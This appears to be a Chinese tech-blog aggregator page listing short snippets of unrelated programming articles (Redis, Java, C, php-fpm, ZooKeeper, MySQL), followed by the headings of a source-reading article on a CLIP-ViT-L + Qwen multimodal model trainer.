本文的作者Armel Nene是ETAPIX Global公司的首席架构师，他居住在伦敦，他参与过的开源项目包括 Apache Lucene,，Apache Nutch， Liferay 和 Pentaho等。如今很多的公司
TeamForge Wiki Syntax & CollabNet User Information Center sunjing TeamForge How do Attachement Anchor Wiki Syntax
the CollabNet user information center http://help.collab.net/ How do I create a new Wiki page? A CollabNet TeamForge project can have any number of Wiki pages. All Wiki pages are linked, and
【Redis四】Redis数据类型 bit1129 redis
概述 Redis是一个高性能的数据结构服务器，称之为数据结构服务器的原因是，它提供了丰富的数据类型以满足不同的应用场景，本文对Redis的数据类型以及对这些类型可能的操作进行总结。 Redis常用的数据类型包括string、set、list、hash以及sorted set.Redis本身是K/V系统，这里的数据类型指的是value的类型，而不是key的类型，key的类型只有一种即string
SSH2整合-附源码白糖_ eclipse spring tomcat Hibernate Google
今天用eclipse终于整合出了struts2+hibernate+spring框架。我创建的是tomcat项目，需要有tomcat插件。导入项目以后，鼠标右键选择属性，然后再找到“tomcat”项，勾选一下“Is a tomcat project”即可。具体方法见源码里的jsp图片，sql也在源码里。补充1：项目中部分jar包不是最新版的，可能导
[转]开源项目代码的学习方法 braveCS 学习方法
转自： http://blog.sina.com.cn/s/blog_693458530100lk5m.html http://www.cnblogs.com/west-link/archive/2011/06/07/2074466.html 1）阅读features。以此来搞清楚该项目有哪些特性2）思考。想想如果自己来做有这些features的项目该如何构架3）下载并安装d
编程之美-子数组的最大和（二维） bylijinnan 编程之美
package beautyOfCoding; import java.util.Arrays; import java.util.Random; public class MaxSubArraySum2 { /** * 编程之美子数组之和的最大值（二维） */ private static final int ROW = 5; private stat
读书笔记-3 chengxuyuancsdn jquery笔记 resultMap配置 ibatis一对多配置
1、resultMap配置 2、ibatis一对多配置 3、jquery笔记 1、resultMap配置当<select resultMap="topic_data"> <resultMap id="topic_data">必须一一对应。 (1)<resultMap class="tblTopic&q
[物理与天文]物理学新进展 comsci
如果我们必须获得某种地球上没有的矿石,才能够进行某些能量输出装置的设计和建造,而要获得这种矿石,又必须首先进行深空探测,而要进行深空探测,又必须获得这种能量输出装置,这个矛盾的循环,会导致地球联盟在与宇宙文明建立关系的时候,陷入困境怎么办呢?
Oracle 11g新特性:Automatic Diagnostic Repository daizj oracle ADR
Oracle Database 11g的FDI（Fault Diagnosability Infrastructure）是自动化诊断方面的又一增强。 FDI的一个关键组件是自动诊断库（Automatic Diagnostic Repository-ADR）。在oracle 11g中，alert文件的信息是以xml的文件格式存在的，另外提供了普通文本格式的alert文件。这两份log文
简单排序:选择排序 dieslrae 选择排序
public void selectSort(int[] array){ int select; for(int i=0;i<array.length;i++){ select = i; for(int k=i+1;k<array.leng
C语言学习六指针的经典程序，互换两个数字 dcj3sjt126com c
示例程序，swap_1和swap_2都是错误的，推理从1开始推到2，2没完成，推到3就完成了 # include <stdio.h> void swap_1(int, int); void swap_2(int *, int *); void swap_3(int *, int *); int main(void) { int a = 3; int b =
php 5.4中php-fpm 的重启、终止操作命令 dcj3sjt126com PHP
php 5.4中php-fpm 的重启、终止操作命令: 查看php运行目录命令：which php/usr/bin/php 查看php-fpm进程数：ps aux | grep -c php-fpm 查看运行内存/usr/bin/php -i|grep mem 重启php-fpm/etc/init.d/php-fpm restart 在phpinfo()输出内容可以看到php
线程同步工具类 shuizhaosi888 同步工具类
同步工具类包括信号量（Semaphore）、栅栏（barrier）、闭锁（CountDownLatch）闭锁（CountDownLatch） public class RunMain { public long timeTasks(int nThreads, final Runnable task) throws InterruptedException { fin
bleeding edge是什么意思 haojinghua DI
不止一次，看到很多讲技术的文章里面出现过这个词语。今天终于弄懂了——通过朋友给的浏览软件，上了wiki。我再一次感到，没有辞典能像WiKi一样，给出这样体贴人心、一清二楚的解释了。为了表达我对WiKi的喜爱，只好在此一一中英对照，给大家上次课。 In computer science, bleeding edge is a term that
c中实现utf8和gbk的互转 jimmee c iconv utf8&gbk编码
#include <iconv.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> int code_c
大型分布式网站架构设计与实践 lilin530 应用服务器搜索引擎
1.大型网站软件系统的特点？ a.高并发，大流量。 b.高可用。 c.海量数据。 d.用户分布广泛，网络情况复杂。 e.安全环境恶劣。 f.需求快速变更，发布频繁。 g.渐进式发展。 2.大型网站架构演化发展历程？ a.初始阶段的网站架构。应用程序，数据库，文件等所有的资源都在一台服务器上。 b.应用服务器和数据服务器分离。 c.使用缓存改善网站性能。 d.使用应用
在代码中获取Android theme中的attr属性值 OliveExcel android theme
Android的Theme是由各种attr组合而成, 每个attr对应了这个属性的一个引用, 这个引用又可以是各种东西. 在某些情况下, 我们需要获取非自定义的主题下某个属性的内容 (比如拿到系统默认的配色colorAccent), 操作方式举例一则: int defaultColor = 0xFF000000; int[] attrsArray = { andorid.r.
基于Zookeeper的分布式共享锁 roadrunners zookeeper 分布式共享锁
首先，说说我们的场景，订单服务是做成集群的，当两个以上结点同时收到一个相同订单的创建指令，这时并发就产生了，系统就会重复创建订单。等等......场景。这时，分布式共享锁就闪亮登场了。共享锁在同一个进程中是很容易实现的，但在跨进程或者在不同Server之间就不好实现了。Zookeeper就很容易实现。具体的实现原理官网和其它网站也有翻译，这里就不在赘述了。官
两个容易被忽略的MySQL知识 tomcat_oracle mysql
1、varchar(5)可以存储多少个汉字，多少个字母数字？　　相信有好多人应该跟我一样，对这个已经很熟悉了，根据经验我们能很快的做出决定，比如说用varchar(200)去存储url等等，但是，即使你用了很多次也很熟悉了，也有可能对上面的问题做出错误的回答。　　这个问题我查了好多资料，有的人说是可以存储5个字符，2.5个汉字（每个汉字占用两个字节的话），有的人说这个要区分版本，5.0
zoj 3827 Information Entropy(水题) 阿尔萨斯 format
题目链接：zoj 3827 Information Entropy 题目大意：三种底，计算和。解题思路：调用库函数就可以直接算了，不过要注意Pi = 0的时候，不过它题目里居然也讲了。。。limp→0+plogb(p)=0，因为p是logp的高阶。 #include <cstdio> #include <cstring> #include <cmath&

[CLIP-VIT-L + Qwen] 多模态大模型源码阅读 - trainer篇

[CLIP-VIT-L + Qwen] 多模态大模型源码阅读 - trainer篇

前情提要

源码阅读

导包

逐行解读

compute_loss方法（重构）

整体含义

逐行解读

save_model函数（重构）

整体含义

逐行解读

create_optimizer函数（重构）

整体含义

逐行解读

create_optimizer_and_scheduler函数（重构）

整体含义

逐行解读

你可能感兴趣的:(多模态大模型源码阅读,多模态学习笔记,人工智能,计算机视觉,python,机器学习,自然语言处理,神经网络,深度学习)